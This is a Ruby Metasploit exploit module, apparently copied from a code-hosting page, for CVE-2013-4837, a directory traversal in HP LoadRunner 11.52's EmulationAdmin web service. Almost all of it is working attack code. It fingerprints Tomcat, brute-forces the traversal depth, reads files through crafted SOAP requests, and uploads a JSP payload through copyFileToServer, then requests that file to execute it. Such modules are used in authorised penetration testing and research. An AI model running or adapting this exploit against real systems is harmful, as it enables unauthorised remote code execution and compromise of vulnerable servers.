250 lines
8.8 KiB
Ruby
250 lines
8.8 KiB
Ruby
|
##
|
||
|
# This module requires Metasploit: http//metasploit.com/download
|
||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||
|
##
|
||
|
|
||
|
require 'msf/core'
|
||
|
|
||
|
class Metasploit3 < Msf::Exploit::Remote
|
||
|
Rank = ExcellentRanking
|
||
|
|
||
|
HttpFingerprint = { :pattern => [ /Apache-Coyote\/1\.1/ ] }
|
||
|
|
||
|
include Msf::Exploit::Remote::HttpClient
|
||
|
include Msf::Exploit::FileDropper
|
||
|
|
||
|
def initialize(info = {})
|
||
|
super(update_info(info,
|
||
|
'Name' => 'HP LoadRunner EmulationAdmin Web Service Directory Traversal',
|
||
|
'Description' => %q{
|
||
|
This module exploits a directory traversal vulnerability on the version 11.52 of HP
|
||
|
LoadRunner. The vulnerability exists on the EmulationAdmin web service, specifically
|
||
|
in the copyFileToServer method, allowing to upload arbitrary files. This module has
|
||
|
been tested successfully on HP LoadRunner 11.52 over Windows 2003 SP2.
|
||
|
},
|
||
|
'Author' =>
|
||
|
[
|
||
|
'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
|
||
|
'juan vazquez' # Metasploit module
|
||
|
],
|
||
|
'License' => MSF_LICENSE,
|
||
|
'References' =>
|
||
|
[
|
||
|
[ 'CVE', '2013-4837' ],
|
||
|
[ 'OSVDB', '99231' ],
|
||
|
[ 'BID', '63475' ],
|
||
|
[ 'ZDI', '13-259' ],
|
||
|
[ 'URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03969437' ]
|
||
|
],
|
||
|
'Privileged' => true,
|
||
|
'Platform' => 'win',
|
||
|
'Arch' => ARCH_JAVA,
|
||
|
'Targets' =>
|
||
|
[
|
||
|
[ 'HP LoadRunner 11.52', { } ],
|
||
|
],
|
||
|
'DefaultTarget' => 0,
|
||
|
'DisclosureDate' => 'Oct 30 2013'))
|
||
|
|
||
|
register_options(
|
||
|
[
|
||
|
Opt::RPORT(8080),
|
||
|
# By default files dropped into C:\windows\system32\null\
|
||
|
OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 3 ]),
|
||
|
# By default HP LoadRunner installed on C:\Program Files\HP\LoadRunner
|
||
|
OptString.new('INSTALLPATH', [ true, 'HP LoadRunner Install Path (from the root folder)', "Program Files\\HP\\LoadRunner" ])
|
||
|
], self.class)
|
||
|
end
|
||
|
|
||
|
def check
|
||
|
depth = datastore['DEPTH']
|
||
|
install_path = datastore['INSTALLPATH']
|
||
|
|
||
|
print_status("#{peer} - Detecting tomcat version...")
|
||
|
tomcat_version = get_tomcat_version
|
||
|
|
||
|
if tomcat_version
|
||
|
print_status("#{peer} - Tomcat #{tomcat_version} detected... Verifying traversal...")
|
||
|
location = ""
|
||
|
location << install_path
|
||
|
location << "\\" unless install_path.ends_with("\\") or install_path.ends_with("/")
|
||
|
location << "apache-tomcat-#{tomcat_version}\\webapps\\ServiceEmulation"
|
||
|
|
||
|
res = read_file(depth, location, "index.jsp")
|
||
|
|
||
|
if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/
|
||
|
print_good("#{peer} - Traversal exists and parameters are correct...")
|
||
|
return Exploit::CheckCode::Vulnerable
|
||
|
elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/
|
||
|
print_warning("#{peer} - Traversal appears to exist, try adjusting parameters DEPTH and INSTALLPATH...")
|
||
|
return Exploit::CheckCode::Appears
|
||
|
else
|
||
|
print_status("#{peer} - Failed to verify the directory traversal...")
|
||
|
end
|
||
|
else
|
||
|
print_error("#{peer} - Tomcat version not detected...")
|
||
|
end
|
||
|
|
||
|
print_status("#{peer} - Checking if the vulnerable web service and method exist...")
|
||
|
res = send_request_cgi({
|
||
|
'uri' => normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin'),
|
||
|
'vars_get' => { 'wsdl' => 1 }
|
||
|
})
|
||
|
|
||
|
if res and res.code == 200 and res.body.to_s =~ /wsdl.*EmulationAdmin/ and res.body.to_s =~ /copyFileToServerRequest/
|
||
|
return Exploit::CheckCode::Detected
|
||
|
end
|
||
|
|
||
|
return Exploit::CheckCode::Safe
|
||
|
end
|
||
|
|
||
|
def exploit
|
||
|
depth = datastore['DEPTH']
|
||
|
install_path = datastore['INSTALLPATH']
|
||
|
|
||
|
print_status("#{peer} - Retrieving the Tomcat version used...")
|
||
|
tomcat_version = get_tomcat_version
|
||
|
|
||
|
if tomcat_version.nil?
|
||
|
fail_with(Failure::NoTarget, "#{peer} - Failed to retrieve the Tomcat version used")
|
||
|
else
|
||
|
print_good("#{peer} - Tomcat #{tomcat_version} found")
|
||
|
end
|
||
|
|
||
|
print_status("#{peer} - Verifying parameters to exploit the directory traversal...")
|
||
|
brute_force = false
|
||
|
location = ""
|
||
|
location << install_path
|
||
|
location << "\\" unless install_path.ends_with("\\") or install_path.ends_with("/")
|
||
|
location << "apache-tomcat-#{tomcat_version}\\webapps\\ServiceEmulation"
|
||
|
|
||
|
res = read_file(depth, location, "index.jsp")
|
||
|
|
||
|
if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/
|
||
|
print_good("#{peer} - Traversal parameters are correct")
|
||
|
elsif res and res.code == 500 and res.body.to_s =~ /FileNotFoundException/
|
||
|
print_error("#{peer} - Traversal parameters are incorrect, will try to brute force depth...")
|
||
|
brute_force = true
|
||
|
else
|
||
|
fail_with(Failure::Unknown, "#{peer} - Unknown error while verifying the traversal parameters")
|
||
|
end
|
||
|
|
||
|
if brute_force
|
||
|
print_status("#{peer} - Trying to brute force the traversal depth...")
|
||
|
depth = brute_force_depth(location)
|
||
|
if depth.nil?
|
||
|
fail_with(Failure::BadConfig, "#{peer} - Traversal parameters are incorrect, try setting DEPTH and INSTALLPATH")
|
||
|
end
|
||
|
print_good("#{peer} - Using #{depth} as depth length to exploit the traversal...")
|
||
|
end
|
||
|
|
||
|
jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
|
||
|
|
||
|
# It's uploading a JSP payload because AutoDeploy on the webapps directory isn't working on my tests
|
||
|
print_status("#{peer} - Uploading the JSP payload...")
|
||
|
res = upload_file(depth, location, jsp_name, payload.encoded)
|
||
|
|
||
|
if res and res.code == 200 and res.body.to_s =~ /copyFileToServerResponse/ and res.body.to_s !~ /faultcode/
|
||
|
print_status("#{peer} - JSP payload uploaded successfully")
|
||
|
register_files_for_cleanup("..\\..\\#{location}\\#{jsp_name}")
|
||
|
else
|
||
|
fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
|
||
|
end
|
||
|
|
||
|
print_status("#{peer} - Executing payload on #{normalize_uri('ServiceEmulation', 'services', 'EmulationAdmin', jsp_name)}...")
|
||
|
|
||
|
send_request_cgi({
|
||
|
'uri' => normalize_uri('ServiceEmulation', jsp_name),
|
||
|
'method' => 'GET'
|
||
|
}, 1)
|
||
|
end
|
||
|
|
||
|
def send_request_soap(soap_request)
|
||
|
res = send_request_cgi({
|
||
|
'uri' => normalize_uri(target_uri.path, 'ServiceEmulation', 'services', 'EmulationAdmin'),
|
||
|
'method' => 'POST',
|
||
|
'ctype' => 'text/xml; charset=UTF-8',
|
||
|
'data' => soap_request,
|
||
|
'headers' => {
|
||
|
'SOAPAction' => '""',
|
||
|
}
|
||
|
})
|
||
|
|
||
|
return res
|
||
|
end
|
||
|
|
||
|
def upload_file(traversal_depth, location, file_name, contents)
|
||
|
path = "..\\" * traversal_depth
|
||
|
path << location
|
||
|
path << "\\" unless location[-1] == "/" or location[-1] == "\\"
|
||
|
path << file_name
|
||
|
soap_request = <<-EOF
|
||
|
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
|
||
|
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
|
||
|
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
|
||
|
xmlns:ser="http://service.emulation.ws.mercury.com">
|
||
|
<soapenv:Header/>
|
||
|
<soapenv:Body>
|
||
|
<ser:copyFileToServer soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
|
||
|
<in0 xsi:type="xsd:int">#{ 30000 + rand(30000) }</in0>
|
||
|
<in1 xsi:type="xsd:string">#{path}</in1>
|
||
|
<in2 xsi:type="xsd:base64Binary">#{Rex::Text.encode_base64(contents)}</in2>
|
||
|
</ser:copyFileToServer>
|
||
|
</soapenv:Body>
|
||
|
</soapenv:Envelope>
|
||
|
EOF
|
||
|
|
||
|
return send_request_soap(soap_request)
|
||
|
end
|
||
|
|
||
|
def read_file(traversal_depth, location, file_name)
|
||
|
path = "..\\" * traversal_depth
|
||
|
path << location
|
||
|
path << "\\" unless location[-1] == "/" or location[-1] == "\\"
|
||
|
path << file_name
|
||
|
|
||
|
soap_request = <<-EOF
|
||
|
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
|
||
|
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
|
||
|
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
|
||
|
xmlns:ser="http://service.emulation.ws.mercury.com">
|
||
|
<soapenv:Header/>
|
||
|
<soapenv:Body>
|
||
|
<ser:getFileContentAsLines soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
|
||
|
<in0 xsi:type="xsd:int">#{ 30000 + rand(30000) }</in0>
|
||
|
<in1 xsi:type="xsd:string">#{path}</in1>
|
||
|
</ser:getFileContentAsLines>
|
||
|
</soapenv:Body>
|
||
|
</soapenv:Envelope>
|
||
|
EOF
|
||
|
|
||
|
|
||
|
return send_request_soap(soap_request)
|
||
|
end
|
||
|
|
||
|
def brute_force_depth(location)
|
||
|
10.times do |i|
|
||
|
res = read_file(i, location, "index.jsp")
|
||
|
|
||
|
if res and res.code == 200 and res.body.to_s =~ /HP Service Emulation/
|
||
|
return i
|
||
|
end
|
||
|
end
|
||
|
|
||
|
return nil
|
||
|
end
|
||
|
|
||
|
def get_tomcat_version
|
||
|
res = send_request_cgi({
|
||
|
'uri' => normalize_uri('webdav')
|
||
|
})
|
||
|
|
||
|
if res and res.code == 200 and res.body.to_s =~ /Apache Tomcat\/([\d\.]+)/
|
||
|
return $1
|
||
|
end
|
||
|
|
||
|
return nil
|
||
|
end
|
||
|
|
||
|
end
|